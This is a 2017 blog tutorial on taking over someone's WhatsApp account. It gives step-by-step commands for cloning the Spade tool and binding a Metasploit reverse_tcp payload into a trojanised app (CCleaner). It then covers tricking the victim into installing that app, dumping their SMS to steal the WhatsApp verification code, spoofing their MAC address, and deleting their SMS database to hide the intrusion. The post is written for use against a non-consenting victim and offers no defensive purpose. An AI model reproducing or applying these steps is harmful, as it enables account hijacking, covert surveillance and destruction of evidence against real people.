Sunday, 2 July 2017

How to Hack whatsapp 2017 method | with proof

Hack whatsapp account 2017 method


Note: Guys it’s not a direct a method to hack Whatsapp, or it’s not a single click hack. It may be work or not everything depends on your social skills and luck.

Whatsapp Hacking step by step Tutorial


Step 1: Firstly, you need an app so victim can download and install that without any doubt and we will bind our payload file with it. So select an app like free version of any paid app or hacked game. I am simply using ccleaner.

Step 2: Our next step will be downloading/ cloning the software is Spade. To download it, go to the terminal in your Kali and type:

 git clone https://github.com/suraj-root/spade.git


In few moments software will be installed to your kali.

Step 3: Now next step is binding the payload with this app, in my case it is ccleaner. Type following command:

./spade.py /root/Desktop/ccleaner.apk

 

Note: My app is in Desktop, if your app is in other directory, specify a path.

Step 4: After that you need specify payload, lhost, lport. For payload select option 3, i.e. reverse_tcp.
 Now lhost and lport :
LHOST: is the ip address of your machine. If you are going through LAN set your local ip, found by typing "ifconfig" in terminal.


 LPORT: the port that meterpreter will connect back to your mechine. It can be any port expects 80.

Note:If you are hacking over WAN, your LHOST is your public ip address which can be easily found through Google. Again for WAN you need port forwarding and set it as 
LPORT.
In my case:
Lhost > 192.168.0.104
Lport>4444


Step 5: After it has all been done successfully, it will ask us to set the listener. Type’y’ here now a new apk will be saved in spade folder, named originalfinal.apk



Step 6: Now finally convince victim to download and install the infected apk (originalfina.apk), as soon as victim opens the apk, you will get a session (what we needed).

Install whatsapp on your phone and put victim’s mobile number, whatsapp will try to verify number through sms.

Step 7: To get that sms, type command 
  dump_sms

a file containing that sms will be created in spade directory, containing all of the person's sms. Use this otp to start whatsapp.



Now here are some points you must remember or you can face in real life.

#1 There are 100% chances that your victim will notice that someone using his whatsapp account as he will asked to verify whatsapp whenever he try to open his whatsapp. To prevent this situation, get the MAC address of victim and spoof your MAC address. In order to spoofing your phone must be rooted. Please go through Google about spoofing MAC address.

#2 He would also able to notice sms he received from whatsapp, to solve this problem you need to delete his sms to do that type

delete data/data/com/android.provider.telephony/database/mmsms.db

But this command only works if victim’s phone is rooted.

It will work if everything goes in your favor. Of course it’s not one of the best and easiest methods. But it helpful in understanding of exploit and mixing things to perform desired attack.

Please comment for any queries.
continue reading How to Hack whatsapp 2017 method | with proof